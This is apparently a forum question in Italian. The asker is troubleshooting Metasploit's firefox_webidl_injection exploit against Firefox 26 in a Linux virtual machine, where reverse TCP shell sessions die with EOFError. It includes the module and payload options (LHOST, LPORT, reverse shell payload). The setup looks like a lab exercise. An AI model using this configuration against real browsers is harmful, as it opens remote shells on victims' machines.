Sto usando il multi/browser/firefox_webidl_injection
exploit per attaccare Firefox 26 su una macchina virtuale Linux. Ho provato a utilizzarlo con i seguenti payload: 1) firefox/shell_reverse_tcp
e 2) generic/shell_reverse_tcp
.
Il mio problema è che ottengo il messaggio Command shell session opened
ma se aspetto qualche tempo o provo a interagire con quella sessione ottengo il Command shell session closed. Reason: Died from EOFError
Con alcuni googling ho scoperto che questo errore probabilmente significa che il payload non viene eseguito correttamente, ma è corretto? Inoltre, cosa posso fare per risolvere questo errore?
Le opzioni che uso sono:
msf exploit(firefox_webidl_injection) > options
Module options (exploit/multi/browser/firefox_webidl_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
CONTENT no Content to display inside the HTML <body>.
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (firefox/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.8.0.2 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal (Javascript XPCOM Shell)